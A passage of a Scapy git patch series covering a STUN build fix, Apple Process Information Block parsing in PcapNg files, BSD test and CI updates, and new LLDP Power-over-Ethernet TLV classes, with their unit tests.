"ff:ff:ff:ff:ff:ff" assert x[1].src == x[1].hwsrc == "cc:cc:cc:cc:cc:cc" assert x[1].hwdst == "00:00:00:00:00:00" assert x[1].psrc == "192.168.0.1" From 160e20d4427a7f9fbc9c784a9839b9ba2d8c8f24 Mon Sep 17 00:00:00 2001 From: gkpln3 Date: Sat, 22 Jun 2024 14:21:56 +0300 Subject: [PATCH 1303/1632] Fixed stun packet creation (#4421) * Fixed stun packet creation * Added unit tests for stun --- scapy/contrib/stun.py | 2 +- test/contrib/stun.uts | 10 ++++++++++ 2 files changed, 11 insertions(+), 1 deletion(-) diff --git a/scapy/contrib/stun.py b/scapy/contrib/stun.py index 92876c4a077..9129204a343 100644 --- a/scapy/contrib/stun.py +++ b/scapy/contrib/stun.py @@ -253,7 +253,7 @@ def post_build(self, pkt, pay): pkt += pay if self.length is None: pkt = pkt[:2] + struct.pack("!h", len(pkt) - 20) + pkt[4:] - for attr in self.tlvlist: + for attr in self.attributes: if isinstance(attr, STUNMessageIntegrity): pass # TODO Fill hmac-sha1 in MESSAGE-INTEGRITY attribute return pkt diff --git a/test/contrib/stun.uts b/test/contrib/stun.uts index 51e2249ae06..2860e55c360 100644 --- a/test/contrib/stun.uts +++ b/test/contrib/stun.uts @@ -136,3 +136,13 @@ assert parsed.transaction_id == 0x1d9357a1e94a2051271996d9, parsed.transaction_i assert parsed.attributes == [ STUNFingerprint(crc_32=0x53800d81) ] + += test STUN packet build +stun = STUN( + stun_message_type="Binding request", + transaction_id=0x7664047a24772b5748c0f173 +) +built = stun.build() +parsed = STUN(built) + +assert parsed.build() == built \ No newline at end of file From 06afa3982f247f6523ed886b12dd63f9ab90b577 Mon Sep 17 00:00:00 2001 From: Guillaume Valadon Date: Sat, 22 Jun 2024 16:24:37 +0200 Subject: [PATCH 1304/1632] PcapNg - Apple Process Information Block (#4396) --- scapy/packet.py | 4 ++- scapy/utils.py | 60 +++++++++++++++++++++++++++++++++++++++++---- test/regression.uts | 10 ++++++++ 3 files changed, 68 insertions(+), 6 deletions(-) diff --git a/scapy/packet.py b/scapy/packet.py index e92f0710bb8..2a1c949a9f4 100644 --- a/scapy/packet.py +++ b/scapy/packet.py @@ -100,7 +100,8 @@ class Packet( "direction", "sniffed_on", # handle snaplen Vs real length "wirelen", - "comment" + "comment", + "process_information" ] name = None fields_desc = [] # type: List[AnyField] @@ -178,6 +179,7 @@ def __init__(self, self.direction = None # type: Optional[int] self.sniffed_on = None # type: Optional[_GlobInterfaceType] self.comment = None # type: Optional[bytes] + self.process_information = None # type: Optional[Dict[str, Any]] self.stop_dissection_after = stop_dissection_after if _pkt: self.dissect(_pkt) diff --git a/scapy/utils.py b/scapy/utils.py index c612e79b159..be58581950a 100644 --- a/scapy/utils.py +++ b/scapy/utils.py @@ -11,6 +11,7 @@ from decimal import Decimal from io import StringIO from itertools import zip_longest +from uuid import UUID import array import argparse @@ -1646,7 +1647,8 @@ class RawPcapNgReader(RawPcapReader): PacketMetadata = collections.namedtuple("PacketMetadataNg", # type: ignore ["linktype", "tsresol", "tshigh", "tslow", "wirelen", - "comment", "ifname", "direction"]) + "comment", "ifname", "direction", + "process_information"]) def __init__(self, filename, fdesc=None, magic=None): # type: ignore # type: (str, IO[bytes], bytes) -> None @@ -1668,8 +1670,10 @@ def __init__(self, filename, fdesc=None, magic=None): # type: ignore 3: self._read_block_spb, 6: self._read_block_epb, 10: self._read_block_dsb, + 0x80000001: self._read_block_pib, } self.endian = "!" # Will be overwritten by first SHB + self.process_information = [] # type: List[Dict[str, Any]] if magic != b"\x0a\x0d\x0d\x0a": # PcapNg: raise Scapy_Exception( @@ -1868,6 +1872,18 @@ def _read_block_epb(self, block, size): # Parse options options = self._read_options(block[opt_offset:]) + + process_information = {} + for code, value in options.items(): + if code in [0x8001, 0x8003]: # PCAPNG_EPB_PIB_INDEX, PCAPNG_EPB_E_PIB_INDEX + proc_index = struct.unpack(self.endian + "I", value)[0] + if proc_index < len(self.process_information): + key = "proc" if code == 0x8001 else "eproc" + process_information[key] = self.process_information[proc_index] + else: + warning("PcapNg: EPB invalid process information index " + "(%d/%d) !" % (proc_index, len(self.process_information))) + comment = options.get(1, None) epb_flags_raw = options.get(2, None) if epb_flags_raw: @@ -1884,6 +1900,7 @@ def _read_block_epb(self, block, size): self._check_interface_id(intid) ifname = self.interfaces[intid][2].get('name', None) + return (block[20:20 + caplen][:size], RawPcapNgReader.PacketMetadata(linktype=self.interfaces[intid][0], # noqa: E501 tsresol=self.interfaces[intid][2]['tsresol'], # noqa: E501 @@ -1892,7 +1909,8 @@ def _read_block_epb(self, block, size): wirelen=wirelen, comment=comment, ifname=ifname, - direction=direction)) + direction=direction, + process_information=process_information)) def _read_block_spb(self, block, size): # type: (bytes, int) -> Tuple[bytes, RawPcapNgReader.PacketMetadata] @@ -1918,7 +1936,8 @@ def _read_block_spb(self, block, size): wirelen=wirelen, comment=None, ifname=None, - direction=None)) + direction=None, + process_information={})) def _read_block_pkt(self, block, size): # type: (bytes, int) -> Tuple[bytes, RawPcapNgReader.PacketMetadata] @@ -1941,7 +1960,8 @@ def _read_block_pkt(self, block, size): wirelen=wirelen, comment=None, ifname=None, - direction=None)) + direction=None, + process_information={})) def _read_block_dsb(self, block, size): # type: (bytes, int) -> None @@ -1995,6 +2015,35 @@ def _read_block_dsb(self, block, size): else: warning("PcapNg: Unknown DSB secrets type (0x%x)!", secrets_type) + def _read_block_pib(self, block, _): + # type: (bytes, int) -> None + """Apple Process Information Block""" + + # Get the Process ID + try: + dpeb_pid = struct.unpack(self.endian + "I", block[:4])[0] + process_information = {"id": dpeb_pid} + block = block[4:] + except struct.error: + warning("PcapNg: DPEB is too small (%d). Cannot get PID!", + len(block)) + raise EOFError + + # Get Options + options = self._read_options(block) + for code, value in options.items(): + if code == 2: + process_information["name"] = value.decode("ascii", "backslashreplace") + elif code == 4: + if len(value) == 16: + process_information["uuid"] = str(UUID(bytes=value)) + else: + warning("PcapNg: DPEB UUID length is invalid (%d)!", + len(value)) + + # Store process information + self.process_information.append(process_information) + class PcapNgReader(RawPcapNgReader, PcapReader): @@ -2013,7 +2062,7 @@ def read_packet(self, size=MTU, **kwargs): rp = super(PcapNgReader, self)._read_packet(size=size) if rp is None: raise EOFError - s, (linktype, tsresol, tshigh, tslow, wirelen, comment, ifname, direction) = rp + s, (linktype, tsresol, tshigh, tslow, wirelen, comment, ifname, direction, process_information) = rp # noqa: E501 try: cls = conf.l2types.num2layer[linktype] # type: Type[Packet] p = cls(s, **kwargs) # type: Packet @@ -2031,6 +2080,7 @@ def read_packet(self, size=MTU, **kwargs): p.wirelen = wirelen p.comment = comment p.direction = direction + p.process_information = process_information.copy() if ifname is not None: p.sniffed_on = ifname.decode('utf-8', 'backslashreplace') return p diff --git a/test/regression.uts b/test/regression.uts index 98d825b107d..fa71faef4ff 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -2274,6 +2274,16 @@ for i in range(len(plist)): assert type(plist_check[i]) == type(plist[0]) assert bytes(plist_check[i]) == bytes(plist[i]) += PcapNg - Process Information Block + +pib_pcapng_file = BytesIO(b'\n\r\r\n\xbc\x00\x00\x00M<+\x1a\x01\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff\x02\x00\x05\x00arm64\x00\x00\x00\x03\x00f\x00Darwin Kernel Version 23.3.0: Thu Dec 21 02:29:41 PST 2023; root:xnu-10002.81.5~11/RELEASE_ARM64_T8122\x00\x00\x04\x00 \x00tcpdump (libpcap version 1.10.1)\x00\x00\x00\x00\xbc\x00\x00\x00\x01\x00\x00\x00 \x00\x00\x00\x01\x00\x00\x00\x00\x00\x08\x00\x02\x00\x03\x00en0\x00\x00\x00\x00\x00 \x00\x00\x00\x01\x00\x00\x80 \x00\x00\x00$\'\x00\x00\x02\x00\x06\x00trustd\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x01\x00\x00\x80$\x00\x00\x00")\x00\x00\x02\x00\x0c\x00mobileassetd\x00\x00\x00\x00$\x00\x00\x00\x06\x00\x00\x00\x90\x00\x00\x00\x00\x00\x00\x00\xfb\x18\x06\x00EcqdB\x00\x00\x00B\x00\x00\x00\xe8\x9f\x80\xfa\x8c\xc6P\xa6\xd8\xd5\x83v\x08\x00E\x00\x004\x00\x00@\x00@\x06\x90T\nh\x01\xc3\xc0\xe5\xdd_\xf4\xb8\x00P\x95\xc3\xcb\x01\xcb\xeb\x11\xe8\x80\x11\x08\x00\x0c\xe6\x00\x00\x01\x01\x08\n\xbe\xb8\xd4\xb3\xbb\x9b4\xbc\x00\x00\x01\x80\x04\x00\x00\x00\x00\x00\x03\x80\x04\x00\x01\x00\x00\x00\x02\x00\x04\x00\x02\x00\x00\x00\x02\x80\x04\x00\x00\x00\x00\x00\x04\x80\x04\x00\x10\x00\x00\x00\x00\x00\x00\x00\x90\x00\x00\x00') + +l = rdpcap(pib_pcapng_file) +assert(len(l) == 1) +assert(TCP in l[0]) +assert(len(l[0].process_information) == 2) +assert(l[0].process_information["proc"]["name"] == "trustd") + = OSS-Fuzz Findings from io import BytesIO From 54fc9e94784f117762764d75fa27bf85d584ef5f Mon Sep 17 00:00:00 2001 From: Guillaume Valadon Date: Sat, 22 Jun 2024 16:46:19 +0200 Subject: [PATCH 1305/1632] *BSD unit tests (#4269) * FreeBSD 14 unit tests * FreeBSD 14 Vagrant * OpenBSD 7.5 unit tests --- doc/vagrant_ci/Vagrantfile | 2 +- doc/vagrant_ci/provision_freebsd.sh | 2 +- scapy/data.py | 2 +- test/configs/bsd.utsc | 3 ++- test/imports.uts | 4 ++-- test/regression.uts | 6 ++++-- tox.ini | 4 ++-- 7 files changed, 13 insertions(+), 10 deletions(-) diff --git a/doc/vagrant_ci/Vagrantfile b/doc/vagrant_ci/Vagrantfile index 59282054ab8..0ba833fd421 100644 --- a/doc/vagrant_ci/Vagrantfile +++ b/doc/vagrant_ci/Vagrantfile @@ -19,7 +19,7 @@ Vagrant.configure("2") do |config| end config.vm.define "freebsd" do |bsd| - bsd.vm.box = "freebsd/FreeBSD-13.1-RELEASE" + bsd.vm.box = "freebsd/FreeBSD-14.0-RELEASE" bsd.vm.provision "shell", path: "provision_freebsd.sh" end diff --git a/doc/vagrant_ci/provision_freebsd.sh b/doc/vagrant_ci/provision_freebsd.sh index 3077d018467..56a9b92203d 100644 --- a/doc/vagrant_ci/provision_freebsd.sh +++ b/doc/vagrant_ci/provision_freebsd.sh @@ -5,7 +5,7 @@ # See https://scapy.net/ for more information # Copyright (C) Philippe Biondi -PACKAGES="git python2 python39 py39-virtualenv py39-pip py27-sqlite3 py39-sqlite3 bash rust sudo" +PACKAGES="git python39 python311 py39-virtualenv py39-pip py39-sqlite3 py311-sqlite3 bash rust sudo" pkg update pkg install --yes $PACKAGES diff --git a/scapy/data.py b/scapy/data.py index 4d951d2c76b..c1d3ac22ced 100644 --- a/scapy/data.py +++ b/scapy/data.py @@ -319,7 +319,7 @@ def load(filename=None): "Couldn't load cache from %s" % str(cachepath), exc_info=True, ) - cachepath.unlink() + cachepath.unlink(missing_ok=True) # Cache does not exist or is invalid. content = func(filename) data = { diff --git a/test/configs/bsd.utsc b/test/configs/bsd.utsc index b437cc7159c..912a4f7c210 100644 --- a/test/configs/bsd.utsc +++ b/test/configs/bsd.utsc @@ -17,7 +17,8 @@ "test/contrib/automotive/ecu_am.uts", "test/contrib/automotive/gm/gmlanutils.uts", "test/contrib/isotp_packet.uts", - "test/contrib/isotpscan.uts" + "test/contrib/isotpscan.uts", + "test/contrib/isotp_soft_socket.uts" ], "onlyfailed": true, "preexec": { diff --git a/test/imports.uts b/test/imports.uts index a9dca268acc..ad6ca83598e 100644 --- a/test/imports.uts +++ b/test/imports.uts @@ -12,7 +12,7 @@ import subprocess import re import time import sys -from scapy.consts import WINDOWS +from scapy.consts import WINDOWS, OPENBSD # DEV: to add your file to this list, make sure you have # a GREAT reason. @@ -47,7 +47,7 @@ ALL_FILES = [ x.split(".")[1] not in EXCEPTION_PACKAGES ] -NB_PROC = 1 if WINDOWS else 4 +NB_PROC = 1 if WINDOWS or OPENBSD else 4 def append_processes(processes, filename): processes.append( diff --git a/test/regression.uts b/test/regression.uts index fa71faef4ff..64791fbd7cc 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -1684,10 +1684,11 @@ assert country == 'US' def _test(): with no_debug_dissector(): x = sr1(IP(dst="www.google.com")/ICMP(),timeout=3) + assert x is not None x assert x[IP].ottl() in [32, 64, 128, 255] assert 0 <= x[IP].hops() <= 126 - x is not None and ICMP in x and x[ICMP].type == 0 + assert ICMP in x and x[ICMP].type == 0 retry_test(_test) @@ -1996,7 +1997,8 @@ retry_test(_test) ~ netaccess needs_root tcpdump * Let's test traceroute def _test(): - ans, unans = traceroute("www.slashdot.org") + with no_debug_dissector(): + ans, unans = traceroute("www.slashdot.org") ans.nsummary() s,r=ans[0] s.show() diff --git a/tox.ini b/tox.ini index fd99680584d..ab08759e20b 100644 --- a/tox.ini +++ b/tox.ini @@ -10,7 +10,7 @@ # minversion = 4.0 skip_missing_interpreters = true # envlist = default when doing 'tox' -envlist = py{37,38,39,310,311,312}-{linux,bsd,windows}-non_root +envlist = py{37,38,39,310,311,312}-{linux,bsd,windows}-{non_root,root} # Main tests @@ -41,7 +41,7 @@ deps = mock zstandard ; sys_platform != 'win32' platform = linux: linux - bsd: darwin|freebsd|openbsd|netbsd + bsd: (darwin|freebsd|openbsd|netbsd).* windows: win32 commands = linux-non_root: {envpython} {env:DISABLE_COVERAGE:-m coverage run} -m scapy.tools.UTscapy -c ./test/configs/linux.utsc -N {posargs} From a28c08903412e9f21a48c869f3759596015c3383 Mon Sep 17 00:00:00 2001 From: "Matsievskiy S.V" Date: Sat, 22 Jun 2024 17:59:43 +0300 Subject: [PATCH 1306/1632] LLDP add PoE TLV (#4346) Co-authored-by: Sergey Matsievskiy --- scapy/contrib/lldp.py | 537 +++++++++++++++++++++++++++++++++++++++++- test/contrib/lldp.uts | 486 ++++++++++++++++++++++++++++++++++++++ 2 files changed, 1019 insertions(+), 4 deletions(-) diff --git a/scapy/contrib/lldp.py b/scapy/contrib/lldp.py index 420d6853abc..6ab62755419 100644 --- a/scapy/contrib/lldp.py +++ b/scapy/contrib/lldp.py @@ -42,10 +42,11 @@ StrLenField, ByteEnumField, BitEnumField, \ EnumField, ThreeBytesField, BitFieldLenField, \ ShortField, XStrLenField, ByteField, ConditionalField, \ - MultipleTypeField + MultipleTypeField, FlagsField, ShortEnumField, ScalingField, \ + BitScalingField from scapy.packet import Packet, bind_layers from scapy.data import ETHER_TYPES -from scapy.compat import orb +from scapy.compat import orb, bytes_int LLDP_NEAREST_BRIDGE_MAC = '01:80:c2:00:00:0e' LLDP_NEAREST_NON_TPMR_BRIDGE_MAC = '01:80:c2:00:00:03' @@ -55,6 +56,13 @@ ETHER_TYPES[LLDP_ETHER_TYPE] = 'LLDP' +class LLDPInvalidFieldValue(Scapy_Exception): + """ + field value is out of allowed range + """ + pass + + class LLDPInvalidFrameStructure(Scapy_Exception): """ basic frame structure not standard conform @@ -147,7 +155,13 @@ def guess_payload_class(self, payload): # type is a 7-bit bitfield spanning bits 1..7 -> div 2 try: lldpdu_tlv_type = orb(payload[0]) // 2 - return LLDPDU_CLASS_TYPES.get(lldpdu_tlv_type, conf.raw_layer) + class_type = LLDPDU_CLASS_TYPES.get(lldpdu_tlv_type, conf.raw_layer) + if isinstance(class_type, list): + for cls in class_type: + if cls._match_organization_specific(payload): + return cls + else: + return class_type except IndexError: return conf.raw_layer @@ -698,6 +712,515 @@ class LLDPDUGenericOrganisationSpecific(LLDPDU): pkt._length - 4) ] + @staticmethod + def _match_organization_specific(payload): + return True + + +class LLDPDUPowerViaMDI(LLDPDUGenericOrganisationSpecific): + """ + Legacy PoE TLV originally defined in IEEE Std 802.1AB-2005 Annex G.3. + + IEEE802.3bt-2018 - sec. 79.3.2. + """ + + # IEEE802.3bt-2018 - sec. 79.3.2.1 + MDI_POWER_SUPPORT = { + (1 << 3): 'PSE pairs controlled', + (1 << 2): 'PSE MDI power enabled', + (1 << 1): 'PSE MDI power supported', + (1 << 0): 'port class PSE', + } + + # IEEE802.3bt-2018 - sec. 79.3.2.2 + PSE_POWER_PAIR = { + 1: 'alt A', + 2: 'alt B', + } + + # IEEE802.3bt-2018 - sec. 79.3.2.3 + POWER_CLASS = { + 1: 'class 0', + 2: 'class 1', + 3: 'class 2', + 4: 'class 3', + 5: 'class 4 and above', + } + + fields_desc = [ + BitEnumField('_type', 127, 7, LLDPDU.TYPES), + BitField('_length', 7, 9), + ThreeBytesField('org_code', LLDPDUGenericOrganisationSpecific.ORG_UNIQUE_CODE_IEEE_802_3), # noqa: E501 + ByteField('subtype', 2), + FlagsField('MDI_power_support', 0, 8, MDI_POWER_SUPPORT), + ByteEnumField('PSE_power_pair', 1, PSE_POWER_PAIR), + ByteEnumField('power_class', 1, POWER_CLASS), + ] + + @staticmethod + def _match_organization_specific(payload): + """ + match organization specific TLV + """ + return (orb(payload[5]) == 2 and orb(payload[1]) == 7 + and bytes_int(payload[2:5]) == + LLDPDUGenericOrganisationSpecific.ORG_UNIQUE_CODE_IEEE_802_3) + + def _check(self): + """ + run layer specific checks + """ + if conf.contribs['LLDP'].strict_mode() and self._length != 7: + raise LLDPInvalidLengthField('length must be 7 - got ' + '{}'.format(self._length)) + + +class LLDPDUPowerViaMDIDDL(LLDPDUPowerViaMDI): + """ + PoE TLV with DLL classification extension specified in IEEE802.3at-2009 + + Note: power values are expressed in units of Watts, + converted to tenth of Watts internally + + IEEE802.3bt-2018 - sec. 79.3.2 + """ + + # IEEE802.3bt-2018 - sec. 79.3.2.4 + POWER_TYPE_NO = { + 1: 'type 1', + 0: 'type 2', + } + + # IEEE802.3bt-2018 - sec. 79.3.2.4 + POWER_TYPE_DIR = { + 1: 'PD', + 0: 'PSE', + } + + # IEEE802.3bt-2018 - sec. 79.3.2.4 + POWER_SOURCE_PD = { + 0b11: 'PSE and local', + 0b10: 'reserved', + 0b01: 'PSE', + 0b00: 'unknown', + } + + # IEEE802.3bt-2018 - sec. 79.3.2.4 + POWER_SOURCE_PSE = { + 0b11: 'reserved', + 0b10: 'backup source', + 0b01: 'primary source', + 0b00: 'unknown', + } + + # IEEE802.3bt-2018 - sec. 79.3.2.4 + PD_4PID_SUP = { + 0: 'not supported', + 1: 'supported', + } + + # IEEE802.3bt-2018 - sec. 79.3.2.4 + POWER_PRIO = { + 0b11: 'low', + 0b10: 'high', + 0b01: 'critical', + 0b00: 'unknown', + } + + fields_desc = [ + BitEnumField('_type', 127, 7, LLDPDU.TYPES), + BitField('_length', 12, 9), + ThreeBytesField('org_code', LLDPDUGenericOrganisationSpecific.ORG_UNIQUE_CODE_IEEE_802_3), # noqa: E501 + ByteField('subtype', 2), + FlagsField('MDI_power_support', 0, 8, LLDPDUPowerViaMDI.MDI_POWER_SUPPORT), + ByteEnumField('PSE_power_pair', 1, LLDPDUPowerViaMDI.PSE_POWER_PAIR), + ByteEnumField('power_class', 1, LLDPDUPowerViaMDI.POWER_CLASS), + BitEnumField('power_type_no', 1, 1, POWER_TYPE_NO), + BitEnumField('power_type_dir', 1, 1, POWER_TYPE_DIR), + MultipleTypeField([ + ( + BitEnumField('power_source', 0b01, 2, POWER_SOURCE_PD), + lambda pkt: pkt.power_type_dir == 1 + ), + ], BitEnumField('power_source', 0b01, 2, POWER_SOURCE_PSE)), + MultipleTypeField([ + ( + BitEnumField('PD_4PID', 0, 2, PD_4PID_SUP), + lambda pkt: pkt.power_type_dir == 1 + ), + ], BitField('PD_4PID', 0, 2)), + BitEnumField('power_prio', 0, 2, POWER_PRIO), + ScalingField('PD_requested_power', 0, scaling=0.1, + unit='W', ndigits=1, fmt='H'), + ScalingField('PSE_allocated_power', 0, scaling=0.1, + unit='W', ndigits=1, fmt='H'), + ] + + @staticmethod + def _match_organization_specific(payload): + """ + match organization specific TLV + """ + return (orb(payload[5]) == 2 and orb(payload[1]) == 12 + and bytes_int(payload[2:5]) == + LLDPDUGenericOrganisationSpecific.ORG_UNIQUE_CODE_IEEE_802_3) + + def _check(self): + """ + run layer specific checks + """ + if conf.contribs['LLDP'].strict_mode() and self._length != 12: + raise LLDPInvalidLengthField('length must be 12 - got ' + '{}'.format(self._length)) + # IEEE802.3bt-2018 - sec. 79.3.2.{5,6} + for field, description, max_value in [('PD_requested_power', + 'PSE requested power', + 99.9), + ('PSE_allocated_power', + 'PSE allocated power', + 99.9)]: + val = getattr(self, field) + if (conf.contribs['LLDP'].strict_mode() and val > max_value): + raise LLDPInvalidFieldValue( + 'exceeded maximum {} of {} - got ' + '{}'.format(description, max_value, val)) + + +class LLDPDUPowerViaMDIType34(LLDPDUPowerViaMDIDDL): + """ + PoE TLV with DLL classification and type 3 and 4 extensions + specified in IEEE802.3bt-2018 + + Note: power values are expressed in units of Watts, + converted to tenth of Watts internally + + IEEE802.3bt-2018 - sec. 79.3.2 + """ + + # IEEE802.3bt-2018 - sec. 79.3.2.6e + PSE_POWERING_STATUS = { + 0b11: '4-pair powering dual-signature PD', + 0b10: '4-pair powering single-signature PD', + 0b01: '2-pair powering', + 0b00: 'ignore', + } + + # IEEE802.3bt-2018 - sec. 79.3.2.6e + PD_POWERED_STATUS = { + 0b11: '4-pair powered dual-signature PD', + 0b10: '2-pair powered dual-signature PD', + 0b01: 'powered single-signature PD', + 0b00: 'ignore', + } + + # IEEE802.3bt-2018 - sec. 79.3.2.6e + PSE_POWER_PAIRS_EXT = { + 0b11: 'both alts', + 0b10: 'alt A', + 0b01: 'alt B', + 0b00: 'ignore', + } + + # IEEE802.3bt-2018 - sec. 79.3.2.6e + DUAL_SIGNATURE_POWER_CLASS = { + 0b111: 'single-signature PD or 2-pair only PSE', + 0b110: 'ignore', + 0b101: 'class 5', + 0b100: 'class 4', + 0b011: 'class 3', + 0b010: 'class 2', + 0b001: 'class 1', + 0b000: 'ignore', + } + + # IEEE802.3bt-2018 - sec. 79.3.2.6e + POWER_CLASS_EXT = { + 0b1111: 'dual-signature pd', + 0b1110: 'ignore', + 0b1101: 'ignore', + 0b1100: 'ignore', + 0b1011: 'ignore', + 0b1010: 'ignore', + 0b1001: 'ignore', + 0b1000: 'class 8', + 0b0111: 'class 7', + 0b0110: 'class 6', + 0b0101: 'class 5', + 0b0100: 'class 4', + 0b0011: 'class 3', + 0b0010: 'class 2', + 0b0001: 'class 1', + 0b0000: 'ignore', + } + + # IEEE802.3bt-2018 - sec. 79.3.2.6d + POWER_TYPE_EXT = { + 0b111: 'ignore', + 0b110: 'ignore', + 0b101: 'type 4 dual-signature PD', + 0b100: 'type 4 single-signature PD', + 0b011: 'type 3 dual-signature PD', + 0b010: 'type 3 single-signature PD', + 0b001: 'type 4 PSE', + 0b000: 'type 3 PSE', + } + + # IEEE802.3bt-2018 - sec. 79.3.2.6d + PD_LOAD = { + 1: 'dual-signature and electrically isolated', + 0: 'single-signature or not electrically isolated', + } + + # IEEE802.3bt-2018 - sec. 79.3.2.6h + AUTOCLASS = { + (1 << 2): 'PSE autoclass support', + (1 << 1): 'autoclass completed', + (1 << 0): 'autoclass request', + } + + # IEEE802.3bt-2018 - sec. 79.3.2.6i + POWER_DOWN_REQ = { + 0x1d: 'power down', + 0: 'ignore', + } + + fields_desc = [ + BitEnumField('_type', 127, 7, LLDPDU.TYPES), + BitField('_length', 29, 9), + ThreeBytesField('org_code', LLDPDUGenericOrganisationSpecific.ORG_UNIQUE_CODE_IEEE_802_3), # noqa: E501 + ByteField('subtype', 2), + FlagsField('MDI_power_support', 0, 8, LLDPDUPowerViaMDI.MDI_POWER_SUPPORT), + ByteEnumField('PSE_power_pair', 1, LLDPDUPowerViaMDI.PSE_POWER_PAIR), + ByteEnumField('power_class', 1, LLDPDUPowerViaMDI.POWER_CLASS), + BitEnumField('power_type_no', 1, 1, LLDPDUPowerViaMDIDDL.POWER_TYPE_NO), + BitEnumField('power_type_dir', 1, 1, LLDPDUPowerViaMDIDDL.POWER_TYPE_DIR), + MultipleTypeField([ + ( + BitEnumField('power_source', 0b01, 2, LLDPDUPowerViaMDIDDL.POWER_SOURCE_PD), # noqa: E501 + lambda pkt: pkt.power_type_dir == 1 + ), + ], BitEnumField('power_source', 0b01, 2, LLDPDUPowerViaMDIDDL.POWER_SOURCE_PSE)), # noqa: E501 + MultipleTypeField([ + ( + BitEnumField('PD_4PID', 0, 2, LLDPDUPowerViaMDIDDL.PD_4PID_SUP), + lambda pkt: pkt.power_type_dir == 1 + ), + ], BitField('PD_4PID', 0, 2)), + BitEnumField('power_prio', 0, 2, LLDPDUPowerViaMDIDDL.POWER_PRIO), + ScalingField('PD_requested_power', 0, scaling=0.1, + unit='W', ndigits=1, fmt='H'), + ScalingField('PSE_allocated_power', 0, scaling=0.1, + unit='W', ndigits=1, fmt='H'), + ScalingField('PD_requested_power_mode_A', 0, scaling=0.1, + unit='W', ndigits=1, fmt='H'), + ScalingField('PD_requested_power_mode_B', 0, scaling=0.1, + unit='W', ndigits=1, fmt='H'), + ScalingField('PD_allocated_power_alt_A', 0, scaling=0.1, + unit='W', ndigits=1, fmt='H'), + ScalingField('PD_allocated_power_alt_B', 0, scaling=0.1, + unit='W', ndigits=1, fmt='H'), + BitEnumField('PSE_powering_status', 0, 2, PSE_POWERING_STATUS), + BitEnumField('PD_powered_status', 0, 2, PD_POWERED_STATUS), + BitEnumField('PD_power_pair_ext', 0, 2, PSE_POWER_PAIRS_EXT), + BitEnumField('dual_signature_class_mode_A', + 0b111, 3, DUAL_SIGNATURE_POWER_CLASS), + BitEnumField('dual_signature_class_mode_B', + 0b111, 3, DUAL_SIGNATURE_POWER_CLASS), + BitEnumField('power_class_ext', 0, 4, POWER_CLASS_EXT), + BitEnumField('power_type_ext', 0, 7, POWER_TYPE_EXT), + BitEnumField('PD_load', 0, 1, PD_LOAD), + ScalingField('PSE_max_available_power', 0, scaling=0.1, + unit='W', ndigits=1, fmt='H'), + FlagsField('autoclass', 0, 8, AUTOCLASS), + BitEnumField('power_down_req', 0, 6, POWER_DOWN_REQ), + BitScalingField('power_down_time', 0, 18, unit='s'), + ] + + @staticmethod + def _match_organization_specific(payload): + ''' + match organization specific TLV + ''' + return (orb(payload[5]) == 2 and orb(payload[1]) == 29 + and bytes_int(payload[2:5]) == + LLDPDUGenericOrganisationSpecific.ORG_UNIQUE_CODE_IEEE_802_3) + + def _check(self): + """ + run layer specific checks + """ + if conf.contribs['LLDP'].strict_mode() and self._length != 29: + raise LLDPInvalidLengthField('length must be 29 - got ' + '{}'.format(self._length)) + # IEEE802.3bt-2018 - sec. 79.3.2.6{a..b,e,g} + for field, description, max_value in [('PD_requested_power', + 'PSE requested power', + 99.9), + ('PSE_allocated_power', + 'PSE allocated power', + 99.9), + ('PD_requested_power_mode_A', + 'PD requested power mode A', + 49.9), + ('PD_requested_power_mode_B', + 'PD requested power mode B', + 49.9), + ('PD_allocated_power_alt_A', + 'PD allocated power alt A', + 49.9), + ('PD_allocated_power_alt_B', + 'PD allocated power alt B', + 49.9), + ('PSE_max_available_power', + 'PSE maximum available power', + 99.9), + ('power_down_time', + 'power down time', + 262143)]: + val = getattr(self, field) or 0 + if (conf.contribs['LLDP'].strict_mode() and val > max_value): + raise LLDPInvalidFieldValue( + 'exceeded maximum {} of {} - got ' + '{}'.format(description, max_value, val)) + + +class LLDPDUPowerViaMDIMeasure(LLDPDUGenericOrganisationSpecific): + """ + PoE TLV measurements in IEEE802.3bt-2018 + + Note: power values are expressed in units of Watts, + converted to hundredths of Watts internally; + energy values are expressed in units of Joules, + converted to tenths of kilo-Joules internally; + voltage values are expressed in units of Volts, + converted to milli-Volts internally; + current values are expressed in units of Amperes, + converted to tenths of milli-Amperes internally. + PSE price index is converted internally. + + IEEE802.3bt-2018 - sec. 79.3.8 + """ + + MEASURE_TYPE = { + (1 << 3): 'voltage', + (1 << 2): 'current', + (1 << 1): 'power', + (1 << 0): 'energy', + } + + MEASURE_SOURCE = { + 0b00: 'no request', + 0b01: 'mode A', + 0b10: 'mode B', + 0b11: 'port total', + } + + POWER_PRICE_INDEX = { + 0xffff: 'not available', + } + + @staticmethod + def _encode_ppi(val): + # IEEE802.3bt-2018 - sec. 79.3.8 + return int(75046 / 2.512 * (val ** (1 / 5)) - 10046) + + @staticmethod + def _decode_ppi(val): + # IEEE802.3bt-2018 - sec. 79.3.8 + return ((val + 10046) * 2.512 / 75046) ** 5 + + fields_desc = [ + BitEnumField('_type', 127, 7, LLDPDU.TYPES), + BitField('_length', 26, 9), + ThreeBytesField('org_code', LLDPDUGenericOrganisationSpecific.ORG_UNIQUE_CODE_IEEE_802_3), # noqa: E501 + ByteField('subtype', 8), + FlagsField('support', 0, 4, MEASURE_TYPE), + BitEnumField('source', 0, 4, MEASURE_SOURCE), + FlagsField('request', 0, 4, MEASURE_TYPE), + FlagsField('valid', 0, 4, MEASURE_TYPE), + ScalingField('voltage_uncertainty', 0, scaling=0.001, + unit='V', ndigits=3, fmt='H'), + ScalingField('current_uncertainty', 0, scaling=0.0001, + unit='A', ndigits=4, fmt='H'), + ScalingField('power_uncertainty', 0, scaling=0.01, + unit='W', ndigits=2, fmt='H'), + ScalingField('energy_uncertainty', 0, scaling=100, + unit='J', ndigits=0, fmt='H'), + ScalingField('voltage_measurement', 0, scaling=0.001, + unit='V', ndigits=3, fmt='H'), + ScalingField('current_measurement', 0, scaling=0.0001, + unit='A', ndigits=4, fmt='H'), + ScalingField('power_measurement', 0, scaling=0.01, + unit='W', ndigits=2, fmt='H'), + ScalingField('energy_measurement', 0, scaling=100, + unit='J', ndigits=0, fmt='I'), + ShortEnumField('power_price_index', 0xffff, POWER_PRICE_INDEX), + ] + + 